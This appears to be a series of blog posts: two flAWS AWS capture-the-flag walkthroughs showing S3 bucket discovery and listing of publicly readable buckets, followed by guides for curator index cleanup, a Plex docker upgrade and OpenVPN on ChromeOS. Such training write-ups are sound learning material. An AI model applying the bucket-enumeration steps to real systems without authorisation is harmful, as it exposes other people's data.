Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

Given that they say this is similar to before, I imagine it’s related to S3 permissions again – and they require us to have our own AWS account, so my initial thinking is that this is a misconfiguration in cross-account access.

We know the bucket name is level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

Configure AWS CLI with your Access Key and Secret Key:

  ~$ aws configure
  AWS Access Key ID [********************]:
  AWS Secret Access Key [********************]:
  Default region name [ap-southeast-1]: us-west-2
  Default output format [None]:

Now let’s list the objects in the bucket via the AWS CLI:

        :~$ aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud --region us-west-2 --recursive
        2017-02-27 10:02:15      80751 everyone.png
        2017-03-03 11:47:17       1433 hint1.html
        2017-02-27 10:04:39       1035 hint2.html
        2017-02-27 10:02:14       2786 index.html
        2017-02-27 10:02:14         26 robots.txt
        2017-02-27 10:02:15       1051 secret-e4443fc.html

Again, the secret file looks good – let’s open it in a browser.

The URL format for S3 HTTP endpoints is as follows: s3-<region>.amazonaws.com/<bucketname>

So given the information we have, we can tell that the s3 end point for this bucket is: http://s3-us-west-2.amazonaws.com/level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

So let’s open the browser to: http://s3-us-west-2.amazonaws.com/level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html

Level 3 unlocked.

flAWS – AWS CTF – Level 1

Level 1 – Challenge statement:

This level is buckets of fun. See if you can find the first sub-domain.

Background

flaws.cloud itself says it best:

Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). 
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.

A series of hints are provided that will teach you how to discover the info you'll need. 
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level. 
At the start of each level you'll learn how to avoid the problem the previous level exhibited.

Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud. 

My approach:

The emphasized word buckets must refer to S3 buckets. And given that S3 buckets can host static websites, it’s likely that flaws.cloud is hosted on S3.

Let’s get the IP address (A record) of flaws.cloud:

  nslookup flaws.cloud

  > flaws.cloud
  Server:         8.8.8.8
  Address:        8.8.8.8#53

  Non-authoritative answer:
  Name:   flaws.cloud
  Address: 54.231.184.251

Now, let’s do a reverse look-up on 54.231.184.251:

  > 54.231.184.251
  Server:         8.8.8.8
  Address:        8.8.8.8#53

  Non-authoritative answer:
  251.184.231.54.in-addr.arpa     name = s3-website-us-west-2.amazonaws.com.

Ok – confirmed. It’s an S3 static website in the us-west-2 region.

If you’re using a custom domain (e.g. flaws.cloud) for your S3-hosted static site, the bucket name must match the domain name.

This tells us the bucket name is flaws.cloud

The URL format for S3 HTTP endpoints is as follows: s3-<region>.amazonaws.com/<bucketname>

So given the information we have, we can tell that the s3 end point for this bucket is: http://s3-us-west-2.amazonaws.com/flaws.cloud

Browse there, and you’ll get an XML response referencing the following files within the bucket:

  • hint1.html
  • hint2.html
  • hint3.html
  • index.html
  • robots.txt
  • secret-dd02c7c.html
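
Equivalently, curl against the endpoint returns the same bucket-listing XML:

  curl http://s3-us-west-2.amazonaws.com/flaws.cloud/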

Obviously secret-dd02c7c.html looks juicy; let’s browse there: http://s3-us-west-2.amazonaws.com/flaws.cloud/secret-dd02c7c.html

Level 2 unlocked.

ELK – Auto-delete older Logstash indices

The following is an approach to auto-deleting Logstash indices in Elasticsearch that are older than X days. The steps below are to be run on your ELK host.

Get curator-cli

sudo pip install elasticsearch-curator -U

Create script

cd ~/
vim elasticsearch_del.sh

My preference is to delete indices older than 30 days; change the 30 to your preference, then save the file.

#!/bin/bash                                                                                                                                           
/usr/local/bin/curator_cli "$@" delete_indices --filter_list '[{"filtertype":"age","source":"creation_date","direction":"older","unit":"days","unit_count":30},{"filtertype":"pattern","kind":"prefix","value":"logstash"}]'

Now make the script executable:
chmod +x elasticsearch_del.sh

Then run the script to make sure it works – use the --dry-run argument to test (i.e. it won’t actually take any action):

./elasticsearch_del.sh --dry-run

If you’re happy with the output and want to run it for real:

./elasticsearch_del.sh

Set up a cron job

crontab -e

Add the following line – changing the schedule to your preference. This runs it every Saturday at 5pm:

0 17 * * SAT /home/db/elasticsearch_del.sh
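
Optionally, redirect the script’s output to a log file so you can review what each run deleted (the log path is just an example):

0 17 * * SAT /home/db/elasticsearch_del.sh >> /home/db/elasticsearch_del.log 2>&1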

timhaak/plex docker upgrade

I’m using the timhaak/plex docker image.

Here’s how to upgrade:

sudo docker pull timhaak/plex

sudo docker stop plex

sudo docker rm plex

Get it running again:
sudo docker run -d --restart=always -e PLEX_ALLOWED_NETWORKS=<CIDR> --name <shortname> -h <hostname> \
  -v <config-location>:/config -v <media-location>:/data/movies \
  -p 32400:32400 -p 32400:32400/udp -p 32469:32469 -p 32469:32469/udp -p 1900:1900/udp \
  -p 32410:32410/udp -p 32412:32412/udp -p 32413:32413/udp -p 32414:32414/udp timhaak/plex

Replace:

<CIDR> with the network range(s), in CIDR notation, allowed to access Plex

<shortname> with what you want the container to be called

<hostname> with what you want the PMS to be called

<config-location> with the location of your Plex config (note to self, mine is: /opt/plex-data/)

<media-location> with the location of your videos/media

Verify upgrade

Show running containers:

sudo docker ps

Take note of the container ID for plex

Get a bash shell to the running Plex container:

sudo docker exec -it <containerid> /bin/bash

Verify the version installed:

dpkg-query -s plexmediaserver | grep "Version"

ChromeOS + OpenVPN (+ TLSAuth)

This is a guide to get OpenVPN (with TLS Auth) working for a ChromeOS client. Note this guide assumes you have control of the OpenVPN server and its associated configuration. It doesn’t explain the specifics of port forwarding on your router, or the use of Dynamic DNS – if you’re doing all of the below I’ll assume you know about those things; if not, there are plenty of tutorials around.

Versions used:

  • ChromeOS 57.0.2987.115 beta – on Samsung Chromebook Plus
  • Ubuntu 14.04 LTS (Bit old I know, but systemd 😦 )
  • OpenVPN 2.3.2 (openvpn 2.3.2-7ubuntu3.1)

Install OpenVPN server and easy-rsa

sudo apt-get install openvpn easy-rsa
sudo mkdir /etc/openvpn/easy-rsa/
sudo cp -r /usr/share/easy-rsa/* /etc/openvpn/easy-rsa/

Create certificates

cd /etc/openvpn/easy-rsa

Edit vars file to update the values

  • Set KEY_SIZE to 2048
  • Also set KEY_COUNTRY, KEY_PROVINCE, KEY_CITY, KEY_ORG, KEY_EMAIL parameters. Don’t leave any of these parameters blank.

Run source ./vars to load the parameters
Run ./clean-all to clear keys and previous files

Now lets create our CA cert and key:

Run ./build-ca. The majority of the defaults will be loaded from the values specified in vars, but you must enter the Common Name (CN) – enter a name that identifies your CA, MyVPN-CA for example. This will create two files: 1) ca.crt, your CA cert (public), and 2) ca.key, your CA private key (secret!)

Now to create the server cert and key:

Run ./build-key-server server. Like the previous command, most values can be defaulted. When prompted for the CN, enter server. Then answer yes to both Sign Certificate and Commit. This will create two files: 1) server.crt, your server’s cert (public), and 2) server.key, your server’s private key (secret!)

Time for the client(s) cert and key(s):

Run ./build-key client1. When prompted for the CN, enter a name unique to each client – e.g. client1. Then answer yes to both Sign Certificate and Commit. This will create two files: 1) client1.crt, your client’s cert (public), and 2) client1.key, your client’s private key (secret!)

Now we need to put the client cert and key into a format understood by ChromeOS, namely PKCS#12. Run openssl pkcs12 -export -in client1.crt -inkey client1.key -certfile ca.crt -name MyClient -out client1.p12. Enter an export passphrase. This will create a file called client1.p12.

You can repeat the above for each client, just incrementing the client number: client2, client3, etc… (a loop sketch follows below).
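
If you have several clients, a small loop saves some typing. A sketch (run from /etc/openvpn/easy-rsa; build-key still prompts interactively for each cert, as does openssl for each export passphrase):

for i in 1 2 3; do
    ./build-key "client$i"
    openssl pkcs12 -export -in "keys/client$i.crt" -inkey "keys/client$i.key" \
        -certfile keys/ca.crt -name "client$i" -out "keys/client$i.p12"
done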

Now to generate the Diffie-Hellman parameters. Run ./build-dh – this may take several minutes. This will create a file called dh2048.pem – this is not secret.

Finally, we should create an OpenVPN static key. Run openvpn --genkey --secret ./keys/ta.key. This will create a file called ta.key – this is another secret. ChromeOS needs this in a strange and specific format: all on one line with inline ‘\n’ escape characters in place of the line breaks. So let’s do that with a bit of Perl – grep -v '#' ./keys/ta.key | perl -p -e 's/\n/\\n/' > ./keys/ta-oneliner.key.

Now we need to copy the files required by the server into the appropriate directory for your OpenVPN server, like this: cp ./keys/ca.crt ./keys/server.crt ./keys/server.key ./keys/ta.key ./keys/dh2048.pem /etc/openvpn/

While we are here, there are a number of files that you need to get to your client (e.g. ChromeOS). There are many ways to do this – for example, copy them somewhere using scp, then copy them into Google Drive. The files your client needs are client1.p12, ca.crt and ta-oneliner.key.

Configure server

sudo nano /etc/openvpn/server.conf

Here is the content of mine, with a comment for each line – known to work with ChromeOS clients (see versions above):


port 443 #Listen on port 443 – change if you like
proto tcp #Use TCP – change to UDP if you prefer
dev tun #Use tun interface – this is recommended for most use cases
ca ca.crt #Read CA cert/pub key from ca.crt (not-secret)
cert server.crt #Read server cert/pub key from server.crt (not-secret)
key server.key #Read server private key from server.key (SECRET!)
dh dh2048.pem #Read Diffie-Hellman (DH) params from dh2048.pem
server 10.8.0.0 255.255.255.248 #IP range for clients – change if you like
push "topology subnet" #Recommended topology
ifconfig-pool-persist ipp.txt #Will try give the same ip to clients every connection
push "redirect-gateway def1" #Override default gateway of client on client
push "dhcp-option DNS 8.8.8.8" #Primary DNS server for clients
push "dhcp-option DNS 8.8.4.4" #Secondary DNS server for clients
keepalive 10 120 #Keep alive params
tls-auth ta.key 0 #Enable additional HMAC auth, reads OpenVPN static key from ta.key
comp-lzo #Enable fast LZO compression
user nobody #Set unpriv'd user
group nogroup #Set unpriv'd group
persist-key # Don't re-read key files on ping restart / SIGUSR1
persist-tun # Don't close/reopen tun interface on ping restart / SIGUSR1
status openvpn-status.log #Write operational status to this file
verb 3 #Enable level 3 debugging verbosity
plugin /usr/lib/openvpn/openvpn-plugin-auth-pam.so login #ChromeOS wants username and password so MAY need this – I'm not convinced

Enable IPv4 forwarding:

Edit /etc/sysctl.conf and uncomment net.ipv4.ip_forward=1 to enable IP forwarding. Then make it take effect by running sudo sysctl -p /etc/sysctl.conf
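
In other words (the sed is just one way to uncomment that line):

sudo sed -i 's/^#net.ipv4.ip_forward=1/net.ipv4.ip_forward=1/' /etc/sysctl.conf
sudo sysctl -p /etc/sysctl.conf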

Restart Openvpn server:

sudo service openvpn restart. And verify it’s actually running – sudo service openvpn status. If it’s not, look in /var/log/syslog for any errors/hints.

Client Configuration (ChromeOS)

Open Chrome – and goto chrome://settings/certificates

Select ‘Authorities’, then ‘Import’, and load in the ca.crt file. When prompted, tick ‘Trust this certificate for identifying websites.’ You should see your certificate in the list under the ‘Private’ parent.

In the same certificates window select the ‘Your Certificates’ tab – then ‘Import and Bind to device…’ and load in the client1.p12 file, entering the passphrase you specified when creating it. You should now see your client certificate listed.

Now we need to create a ONC file for ChromeOS:

  1. Generate two random GUIDs via https://www.uuidgenerator.net/ or similar. Refresh the page to get your second one. Take note of both; I will refer to them as GUID#1 and GUID#2
  2. Copy the following into a text editor on your Chromebook:


{
  "Type": "UnencryptedConfiguration",
  "Certificates": [ {
    "GUID": "{<GUID#1>}",
    "Type": "Authority",
    "X509": "<CA_CERT>"
  } ],
  "NetworkConfigurations": [ {
    "GUID": "{<GUID#2>}",
    "Name": "<VPN_NAME>",
    "Type": "VPN",
    "VPN": {
      "Type": "OpenVPN",
      "Host": "<HOSTNAME>",
      "OpenVPN": {
        "ServerCARef": "{<GUID#1>}",
        "AuthRetry": "interact",
        "ClientCertType": "Pattern",
        "ClientCertPattern": {
          "IssuerCARef": [ "{<GUID#1>}" ]
        },
        "CompLZO": "true",
        "Port": 443,
        "Proto": "tcp",
        "RemoteCertTLS": "server",
        "RemoteCertEKU": "TLS Web Server Authentication",
        "SaveCredentials": false,
        "ServerPollTimeout": 10,
        "Username": "<USERNAME>",
        "KeyDirection": "1",
        "TLSAuthContents": "<TLS_AUTH_KEY>"
      }
    }
  } ]
}

3. Replace the following values in the file above:

  • <GUID#1> – paste value from earlier
  • <GUID#2> – paste value from earlier
  • <VPN_NAME>: Enter a name for your connection. This is what you’ll see in the ChromeOS VPN UI.
  • <CA_CERT>: This is the contents of ca.crt without the header and footer lines, all on one long line – one long string of base64-encoded ASCII, typically beginning with “MII”. Remove the newlines in the cert; the footer line “-----END CERTIFICATE-----” is also not included. (See the one-liner after this list.)
  • <HOSTNAME>: This is simply the hostname of your VPN server. Do not include the port – that is specified by the ‘Port’ parameter; change it if you’re not using 443.
  • <USERNAME>: Your username on the VPN server.
  • <TLS_AUTH_KEY>: The TLS auth key. Open ta-oneliner.key and paste the contents.
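
One way to produce the single-line <CA_CERT> value is to strip the PEM header/footer lines and join the base64 body:

grep -v '^-----' ca.crt | tr -d '\n'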

Save your ONC file. Note it contains secret information, so treat it accordingly. Any filename will do, but keep the .onc extension.

Now we need to install the ONC file:

  • In Chrome goto chrome://net-internals#chromeos
  • Click ‘Choose File’ under ‘Import ONC file’
  • Select your ONC file. Note you may get no positive or negative response from the import attempt. Just go to the VPN UI in the ChromeOS launcher – if the import succeeded you’ll see your VPN connection listed.

Test!

Drop comments/queries below and I’ll assist if I can.

Source and extra reading